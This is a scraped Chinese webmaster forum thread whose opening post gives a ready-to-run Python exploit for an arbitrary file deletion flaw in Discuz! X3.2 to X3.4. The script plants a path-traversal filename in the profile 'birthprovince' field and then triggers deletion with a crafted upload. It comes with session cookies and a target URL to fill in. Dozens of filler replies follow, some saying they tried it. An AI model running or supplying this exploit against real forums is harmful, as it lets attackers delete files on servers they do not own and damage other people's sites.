好帖子 顶一个

果然厉害

厉害了，老铁

啦啦啦啦啦啦啦

好帖 顶一个看看

这么厉害的操作。。

大叔大婶多无大所

这么狠。。。{:18:}

谢谢分享哦

Discuz!X3.4 X3.3 X3.2永久删除你在任何DZ论坛的帐号漏洞

厉害了

关键是如何修复漏洞呢？

谢谢分享哦

沙发上发生的发生的

啊啊啊啊啊啊啊啊啊啊啊啊阿啊啊啊

我来看看嫩嗯嗯嗯呢呢

感谢楼主分享 好人一生平安

zczcz在此次错错错

6666,看看好用不....

厉害:Q:lol:loveliness:

这个要学习一下了

正好试试。谢谢楼主

还有这种漏洞啊

看看是怎么回事，好好学习一下！

RE: Discuz!X3.4 X3.3 X3.2永久删除你在任何DZ论坛的帐号漏洞 [修改]

我看看。。

台湾手套

看看....

过来看看。

好帖 顶一个看看

学习了

RE: Discuz!X3.4 X3.3 X3.2永久删除你在任何DZ论坛的帐号漏洞 [修改]

厉害了 看看 这么狠

奈斯很不错呐

测试112233

厉害了

了LL连连看

很强...:D

顶顶顶顶顶顶顶顶顶顶顶顶顶的顶顶顶顶顶多多多

真的好厉害

阿浪丰厚的

discuz！框架的漏洞还真的多

可以牛逼666

我来看一下是什么

挺厉害的，学习一下

好东西，我看看哈

Discuz!X3.4 X3.3 X3.2永久删除你在任何DZ论坛的帐号漏洞

法国梵蒂冈地方官梵蒂冈是

必须过来看看

Discuz!X3.4 X3.3 X3.2永久删除你在任何DZ论坛的帐号漏洞 [修改]

感觉很厉害啊，看看是什么情况。

这个应该被修复了吧

谢谢分析,搂住

谢谢lz

看下咋回事安居客附近撒货到公益免费接撒的和

学习一下 学习一下 看有用没

谢谢分享，查看一下漏洞

好强的样子 我看看

看看什么BUG漏洞。

感谢，看看

萨芬的GV水电费感受到过十多个

不错。谢谢

的点点滴滴

来看看看看，学习

aaaa啊啊啊啊

[修改]
高级模式
BColorImageLinkQuoteCodeSmilies

本版积分规则参与/回复主题
974970545设置新浪微博登陆 绑定百度帐户通知(1)快捷导航 退出收藏本站登录记录资源库资料库
站长窝
123

帖子
请输入搜索内容

首页综合资源开通赞助(ViP)每日更新热门下载最新模板应用中心
论坛任务每日签到宣传赚币个人中心空间动态精彩淘帖兴趣群组我的收藏排行榜领取勋章邀请注册
站长窝»首页›站长交流专区›站长头条›Discuz!X3.4 X3.3 X3.2永久删除你在任何DZ论坛的帐号漏 ...
国内真正的高防服务器远程图片本地化自动 v1.0.5 - DZ建站学习研究分享 · 插件 专业开源[1314]IT618威客插件5.1版安装问题小说阅读器 专业版9.9.4 还更新吗 长篇的采集不了建网站应该选择什么样的服务器？热度[柒瑞]开放式竞猜 ver2.6 带手机触屏版 Ver：V2.0--------下载地址[柒瑞]开放式竞猜 ver2.6 带手机触屏版 Ver：V2.0 DZ建站学习研究分享 · 插件MIP改造推送seo 推送失败 / 错误码:Quota free微信公众号流量变现——了解一下2018年7月19日站长窝签到记录贴远程图片本地化自动 v1.0.4 - DZ建站学习研究分享 · 插件 专业开源[1314]SEO超级伪静态 V3.6.8 高级版 - DZ建站学习研究分享 · 插件 专业开源[1314][1314]首页N格 V2.8.8 - DZ建站学习研究分享 · 插件 专业开源[1314]申请更新 视频课堂直播点播 高级教育版v4.3.3 DZ建站学习研究分享请问有没有志愿者模板或者源码啊N5城市门户系列-V9 导入DIY文件的问题淘宝客导购小程序1.0 集淘宝、京东、拼多多三位一体的返利导购小程序人才网站源码PHP云人才招聘系统V4.5版,新模板+新手机端 大气界面非常不错技术员联盟Ghost Win8.1 32位装机版V2018.07
国内真正的高防服务器远程图片本地化自动 v1.0.5 - DZ建站学习研究分享 · 插件 专业开源[1314]IT618威客插件5.1版安装问题小说阅读器 专业版9.9.4 还更新吗 长篇的采集不了建网站应该选择什么样的服务器？热度[柒瑞]开放式竞猜 ver2.6 带手机触屏版 Ver：V2.0--------下载地址[柒瑞]开放式竞猜 ver2.6 带手机触屏版 Ver：V2.0 DZ建站学习研究分享 · 插件MIP改造推送seo 推送失败 / 错误码:Quota free微信公众号流量变现——了解一下2018年7月19日站长窝签到记录贴远程图片本地化自动 v1.0.4 - DZ建站学习研究分享 · 插件 专业开源[1314]SEO超级伪静态 V3.6.8 高级版 - DZ建站学习研究分享 · 插件 专业开源[1314][1314]首页N格 V2.8.8 - DZ建站学习研究分享 · 插件 专业开源[1314]申请更新 视频课堂直播点播 高级教育版v4.3.3 DZ建站学习研究分享请问有没有志愿者模板或者源码啊N5城市门户系列-V9 导入DIY文件的问题淘宝客导购小程序1.0 集淘宝、京东、拼多多三位一体的返利导购小程序人才网站源码PHP云人才招聘系统V4.5版,新模板+新手机端 大气界面非常不错技术员联盟Ghost Win8.1 32位装机版V2018.07
站长窝建站学习手册发布 站长窝Discuz开发资料库发布 站长窝 - Discuz! 应用研发动态 关于站长窝贡献币与积分的详细说明，请点击查看详情!
友链交换平台 建站学习研究资源分享白皮书发布 请各位站长窝会员加强账户安全，加紧验证邮箱! 本站已启用备用域名:www.cgzz8.com (请收藏备用!)
1234567
1
/ 7 页下一页
返回列表发新帖回复
Discuz!X3.4 X3.3 X3.2永久删除你在任何DZ论坛的帐号漏洞
查看: 4069|回复: 65
打印 上一主题 下一主题 Discuz!X3.4 X3.3 X3.2永久删除你在任何DZ论坛的帐号漏洞 [复制链接]
民审-M

3794
主题
8045
热度
7340
贡献
民审

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
import re
import urllib2

‘‘‘
Discuz!X ≤3.4 任意文件删除漏洞
Write by Aaron
‘‘‘

def get_cookie():
cookies={}
for line in raw_cookies.split(‘;‘):
key,value=line.split(‘=‘,1)
cookies[key]=value
return cookies
def get_formhash(url):
cookies=get_cookie()
testurl=url+"/home.php?mod=spacecp"
s=requests.get(testurl,cookies=cookies)
com = re.compile(‘<input type="hidden" name="formhash" value="(.*?)" />‘)
result = com.findall(s.text)
return result[0]
def del_step1(url,filename):
headers={‘User-Agent‘:‘Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0‘}
geturl=url+"/home.php?mod=spacecp&ac=profile&op=base"
formhash=get_formhash(url)
payload ={‘birthprovince‘:filename,"profilesubmit":1,"formhash":formhash}
cookies=get_cookie()
r = requests.post(geturl,data=payload,headers=headers,cookies=cookies)
if r.content.find(‘parent.show_success‘)>0:
print ‘Step1 success!!!‘
def del_step2(url):
geturl=url+"/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa"
heads={‘User-Agent‘:‘Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0‘}
formhash=get_formhash(url)
files ={‘formhash‘:(None,formhash),‘birthprovince‘:(‘1.jpg‘,open(‘1.jpg‘,‘rb‘),‘image/jpeg‘),‘profilesubmit‘:(None,‘1‘)}
cookies=get_cookie()
r=requests.post(geturl,files=files,headers=heads,cookies=cookies)
if r.text.find(‘parent.show_success‘)>0:
print ‘Step2 success!!!‘

if __name__ == ‘__main__‘:
#需要修改以下三个参数：
#1、设置cookie
raw_cookies="G2pl_2132_sid=sKKQZK; G2pl_2132_saltkey=Sz3Zk9qK; G2pl_2132_lastvisit=1506772875; G2pl_2132_lastact=1506779386%09home.php%09spacecp; G2pl_2132_seccode=7.aa0407e77fa5c31c1b; G2pl_2132__refer=%252Fhome.php%253Fmod%253Dspacecp%2526ac%253Dprofile%2526op%253Dbase; G2pl_2132_ulastactivity=d085JjIjS5HiG3obxleJQuw0zNYpIN60OXJV0J6di%2B8aFmKQ4u6l; G2pl_2132_auth=86c5F09hGuaZuGNPSX7Pr7Oy4Mq2B39nSviv%2FRFC8vdn1Zjb9PibvU2fN4jJr9Hr7yVNf2vH9rIXrSLWhMZk; G2pl_2132_nofavfid=1; G2pl_2132_sendmail=1; G2pl_2132_noticeTitle=1"
#2、设置删除的文件
filename="../../../111.txt"
#3、设置url
url="http://127.0.0.1"
del_step1(url,filename)
del_step2(url)

蟹蟹楼楼的分享

看看这个东西是怎么玩的的。

真的大家厉害

厉害里哈厉害

尝试一下

哇，这也行吗？

支持了，看看

看眼，需哦写了

;Pdas阿三的地方范德萨

看看，顶一个

厉害了！！！！！！1

按时大苏打

是什么好东西,值得我看!

Discuz!X3.4 X3.3 X3.2永久删除你在任何DZ论坛的帐号漏洞 [修改]

我想看看有没有这个漏洞

感谢楼主的分享....

发酵理论雕刻家发克拉加速度离开飞机安卡拉圣诞节发绿卡水浇地了罚款就

先评论再说

刚操作过了我现在过来看来有没有删除

膜拜大佬

学习的路太多

RE: Discuz!X3.4 X3.3 X3.2永久删除你在任何DZ论坛的帐号漏洞 [修改]

历害了老铁

看一看好不好用

永久删除你在任何DZ论坛的帐号漏洞 [

2会不会玩了？支援呢？人呢？会不会支援一下啊

厉害厉害

看看看看看看

看看啊，不催啊啊..

牛逼厉害，谢谢分享

太溜了 厉害

谢谢大神呀哈哈哈